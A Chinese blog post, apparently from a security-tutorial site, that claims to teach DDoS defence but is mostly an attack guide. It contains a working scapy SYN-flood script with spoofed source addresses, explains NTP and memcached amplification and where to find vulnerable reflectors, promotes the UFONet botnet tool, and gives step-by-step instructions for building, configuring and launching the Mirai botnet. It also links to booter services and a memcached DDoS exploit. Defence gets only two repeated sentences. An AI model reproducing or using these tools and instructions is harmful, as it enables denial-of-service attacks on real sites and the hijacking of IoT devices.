首先,我写这篇文章的目的是为了让大家更多的去了解如何防护ddos攻击,所以请勿用作违法行为!

不知攻,何知放?在我们对ddos攻击进行防御之前,一定要了解黑客是如何进行ddos攻击的。同时我今天还会为大家详细介绍一下目前新出现的mem放大以及其他主要攻击方式。

(东京的景色如何?)

一. DOS攻击

首先,拒绝服务攻击的关键是什么?是流量足够大,才可以成功。在黑客目前没有肉鸡的情况下,把流量搞到尽量最大才是重点!

1.如何保护攻击者自身的安全?

如果你是dos攻击,并且不对自己做任何保护,你的原地址肯定会暴露。两种方法:代理,伪造源地址。这里我就直接来说伪造原地址。python中有一个randip的模块,他可以随机生成ip地址。

#-- coding:utf-8 --
#by FhoeniX
import sys
from scapy.all import *

def start(argv):
if len(sys.argv)<2:
print(sys.argv[0] +" <target_ip>")
sys.exit(0)
while(1):
pdst = sys.argv[1]
send(IP(src=RandIP(),dst=pdst)/TCP(dport=80,flags=“S”))#randip随机生成ip端口自己看的办

if __name__ == '__main__':
#定义异常
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print("interrupted by user, killing all threads...")

这是我自己简单写的一个伪造源地址的python源码。

2. 什么是slowloris攻击?

相信平时各位肯定都听过,就是说你向服务器同时建立多个连接并且不让服务器断开,这样就会造成服务器资源耗尽。这里我就不仔细说了哈。

3. 什么是cc攻击?

cc攻击就是不断向服务器请求会耗费较大资源的应用

4.什么是放大反射?

可能各位会听过ntp放大反射攻击,这是什么呢?在其实是ntp服务器的一个漏洞。就是说你向有漏洞的ntp发送一个又问题的udp数据包,同时你把它的源地址换成目标地址。然后,ntp服务器发现你这个数据包有问题,于是ntp服务器会把这个数据包发送回去,接着服务器会查询数据包原地址,但是原地址并不是你的,而是目标网站的。所以ntp服务器会把数据包发给目标网站,而且,会造成放大的效果。

ntp放大大概有几十倍,就是说你发1k的数据包给ntp服务器,服务器会发20k的数据包给目标网站!

当然,这不算什么,真正厉害的是mem放大反射,原理和ntp差不多,都是发送udp数据包。理论上来说可以造成几万倍的放大!曾经github就是被mem攻击的。放大反射其实就是服务器的漏洞,你可以在shodan上面找到有漏洞的mem服务器,而且将近10万台。

下面给各位展示一下我自己写的反射工具–fhoenix(这里我用了etherape进行流量监控,酷不酷?)

二. DDOS攻击

这里我也不想多说了,各位想一想,如果黑客命令自己的肉鸡去放大反射会怎么样?但是现在我国已经清除了不少mem放大反射源。而且现在又有各种五花八门的什么云清洗,什么高防。。。。。

三. 僵尸网络工具–ufonet

这是一款利用僵尸网络的ddos工具,以前我尝试过。然后某个网站几分钟之美就炸了。这个工具知道的人不多,请勿用作违反行为!我对此不负责!!!
官网:https://ufonet.03c8.net/ 主要是,这东西还支持图形界面–6666666666666.这是py编写的~
对了,这玩意还支持自己抓鸡!!!!!哦哦哦哦哦哦!!!

(图形界面最好在ubuntu运行)

四.物联网破坏者Mirai病毒

mirai今天我就来讲讲他的原理和如何搭建

1.原理

2.如何搭载mirai?

这里我建议各位用ubuntu操作系统,因为kali环境变量会有bug

一、准备
1.Mirai 使用了 C,Go 两种编程语言,使用数据库存储数据,因此提前安装需要软件如下命令:

sudo apt-getinstall git
sudo apt-getinstall gcc
sudo apt-getinstall golang
sudo apt-getinstall electric-fence
sudo apt-getinstall mysql-server mysql-client

2.下载源码

git clone https://github.com/jgamblin/Mirai-Source-Code

3.修改参数,配置CNC

cd mirai/tools && gcc enc.c -o enc.out//编译enc可执行文件,用于ip地址异或./enc.outstringcnc.changeme.com   //会返回一串“\x”字符串 (其实就是加密了 cnc.changeme.com)./enc.outstringreport.changeme.com   //会返回一串“\x”字符串

分别替换tables.c文件中的18行和21行的“\x”字符串和后面的另一个参数

记得:要修改两个参数!(\x字符串和后面的长度的参数)

4.配置数据库

cd ../../scripts   //进入script目录gedit db.sql   //编辑大db.sql文件

添加`use mirai;如下图```

service mysql start   //启动Mysql 服务cat db.sql | mysql -uroot -proot
mysql -uroot -proot    //以用户名和密码都是`root`登录数据库INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');   //添加的用户exit   //退出

修改mirai/cnc/main.go中用户名和密码与设置的一样。修改后如下

5.配置交叉编译环境

cd .. && mkdir cross-compmile-bin   //这里是在`Mirai-Source-Code`目录下新建cd cross-compile-bin

下载如下11个压缩包

wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2cd ../scripts
sudo ./cross-compile.sh

编译过程会提示是否安装 mysql,选否就可以

gedit ~/.bashrc   //打开环境变量

把以下放到最后

source ~/.bashrc     //刷新环境变量

6.编译CNC 和bot

go getgithub.com/go-sql-driver/mysql
go getgithub.com/mattn/go-shellwords
cd ../mirai
./build.sh debug telnet
cd ../loader
./build.sh

至此环境全部配置完成。

二、说明
设备情况:
电脑A:作为第一个被感染的设备。在48101端口运行./mirai.dbg进行扫描爆破。
电脑B:作为CNC&Loader。
CNC时:在分别在23和101 端口运行./cnc发送攻击指令、与bot保持连接。
Loader时:在48101端口运行./scanList持续监听。

连接情况:
1 电脑 A、B通过wifi连接宿舍局域网。
2 摄像头A、B利用交换机与宿舍路由器连接。
最终就是保证四台设备要在同一网络下,能够相互连接。

三、测试
1.还需要一点调整
由于cnc启动是在/debug/cnc目录下进行的,但是源码里写的是绝对路经。(如下图)

所以我们把mirai目录下的prompt.txt移动到/debug/cnc下。

2.启动CNC (电脑B)

go build -o debug/cnc cnc/*.go    //在mirai 目录下运行
./debug/cnc

再新开一个终端尝试连接 (可能需要管理员权限)

telnet cnc.change.com 23

得到如下提示后再按一下回车,输入用户名密码登录

得到下图反馈表示登录成功!

3 启动loader (电脑B)

cd mirai/debug
sudo ./scanListen

通过查看48101端口是可以看到该端口在运行该程序

netstat -lput   //查看端口指令

4 启动扫描程序 (电脑A)
由于源码默认在 debug 模式中关闭了 scanner 功能,将bot/main.c 中157行和162行注释后即可运行。

之后重新编译运行即可
mirai目录下运行如下

./build.sh  debug telnet

mirai/debug目录下运行如下(这里注意一定要用管理员权限进行)

sudo ./mirai.dbg

则会开始扫描如下:

5
控制扫描ip
由于源码中是随机找一个ip进行爆破
mirai/bot/scanner.c674行起),修改代码后暂时可以固定一位ip地址扫描。修改后固定第一位为‘10’,结果如下:

好了,下面来展示一下

nice~

(日本挺漂亮滴)

五.目前主流的botnet以及其他…

目前主流ddos僵尸网络病毒名称: mirai,billgates,mayday,gafgyt,booter,stresser

挖矿病毒:https://github.com/xmrig

bootnet合集: top10booters.com

dns flood attack : netstress-ng

mem攻击:https://github.com/649/Memcrashed-DDoS-Exploit

(还不快给我点个赞!!!!!!!!!!!!!!!!!!!!!!!!)

当然,我们面对ddos当然是可以防御的,就比如云清洗

当然,我们面对ddos当然是可以防御的,就比如云清洗。我写这篇文章的目的是为了让大家更多的去了解如何防护ddos攻击,

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:

我对DDos攻击的见解以及ufonet和mirai分布式拒绝服务攻击工具的介绍相关推荐

  1. DDoS攻击详解ufonet、Mirai分布式拒绝服务攻击工具的介绍

    前言 大家好.今天和大家聊聊DDoS攻击 首先,我写这篇文章的目的是为了让大家更多的去了解如何防护DDoS攻击,所以请勿用作违法行为! 不知攻,何知防?在我们对DDoS攻击进行防御之前,一定要了解骇客 ...

  2. DDoS分布式拒绝服务攻击简介

    分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同 ...

  3. 分布式拒绝服务攻击(DDoS)原理及防范

    转自:http://www.cnblogs.com/rootq/archive/2009/11/06/1597215.html http://www.ibm.com/developerworks/cn ...

  4. DRDoS(memcache漏洞导致的反射型分布式拒绝服务攻击)

    一.DDoS基础 见博文:DDoS攻击与防御 二.Memcached 反射DDOS攻击原理 反射DDOS是发送大量带有被害者IP地址的请求给反射服务器,反射服务器对IP地址源做出大量回应,形成拒绝服务 ...

  5. 【计算机网络】网络安全 : 计算机网络安全威胁 ( 四种网络攻击类型 | 主动攻击与被动攻击 | 分布式拒绝服务攻击 DDos | 恶意程序 | 计算机网络安全目标)

    文章目录 一.网络安全内容 二.四种网络攻击 三.被动攻击 与 主动攻击 四.分布式拒绝服务 DDos 五.恶意程序 六.计算机网络安全目标 一.网络安全内容 网络安全内容 : 网络安全概述 对称加密 ...

  6. 计算机网络】网络安全 : 计算机网络安全威胁 ( 四种网络攻击类型 | 主动攻击与被动攻击 | 分布式拒绝服务攻击 DDos | 恶意程序 | 计算机网络安全目标)

    一.网络安全内容 网络安全内容 : 网络安全概述 对称加密 和 非对称加密 体质 数字签名 因特网安全协议 链路加密 与 端到端加密 防火墙 二.四种网络攻击 四种网络攻击 : ① 截获 : 窃听 其 ...

  7. 拒绝服务攻击/分布式拒绝服务攻击

    拒绝服务(Denial of Service,简称DoS) 是一种简单的破坏性攻击.通常是利用传输协议下的某个弱点.系统存在的漏洞.或服务器的漏洞.对目标系统发起大规模的进攻.用超出目标处理能力的海量 ...

  8. DDoS(Distributed Denial of Service,分布式拒绝服务)

    DDoS:Distributed Denial of Service,即分布式拒绝服务攻击. 借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高 ...

  9. ICMP拒绝服务攻击(原始套接字系列四)

    拒绝服务攻击(DoS)企图通过使被攻击的计算机资源消耗殆尽从而不能再提供服务,拒绝服务攻击是最容易实施的攻击行为.中美黑客大战中的中国黑客一般对美进行的就是拒绝服务攻击,其技术手段大多不够高明. IC ...

最新文章

  1. 在 Delphi 下使用 DirectSound (12): 测试失真效果器 IDirectSoundFXDistortion8
  2. 切换tab页时,tab页中的echart变形问题
  3. linux命令窗口颜色,如何修改ssh命令行下登录时的颜色
  4. [poj3261]Milk Patterns
  5. PHP开发的爱情盲盒交友系统网站源码
  6. Stopwatch示例
  7. linux的vi编辑器的dd命令,linux vi 后dd命令
  8. ResNet网络结构详解(Tensorflow2.6.0实现网络结构)
  9. 批量导出docker images 批量导入docker镜像
  10. java语音转文字_快速实现语音转文字,还自带翻译
  11. 马云 996 一文的诡辩与话术:大家是怎么被洗脑还帮人数钱的
  12. 戾气遍地的社会,我们该如何远离垃圾人?(深度)
  13. 大神级DIY作品:运动跟随大眼睛,软件硬件结构一个都不能少
  14. JAVA——JSch
  15. 使用fiddler代替charles将react中的axios请求重定向到本地文件,兼容谷歌浏览器chrome
  16. 深度学习笔记(五) 代价函数的梯度求解过程和方法
  17. Aras Innovator Method集成Visual Studio
  18. 一般的Java项目需要JVM调优吗?
  19. html5本地数据库 没有用,【HTML5初探之本地存储】如果没有数据库。。。
  20. netty之心跳机制

热门文章

  1. Mac关闭顽固的开机启动程序
  2. 2014武汉理工计算机专业李帅,武汉理工大学第三届届学位评定委员会
  3. 检测linux是否安装apache,linux重启apache并检测apache是否启动
  4. 阿里园区竟然开了一家微笑就可以打折的店
  5. jspdf 添加页眉页脚_如何使用HTML向网页添加页脚
  6. 微信小程序学习第二章--小试牛刀(写一个页面吧)
  7. Mybatis中xml使用小于号
  8. Numpy - 知识点总结(五)
  9. docker 学习使用记录
  10. 2021年R2移动式压力容器充装考试APP及R2移动式压力容器充装模拟考试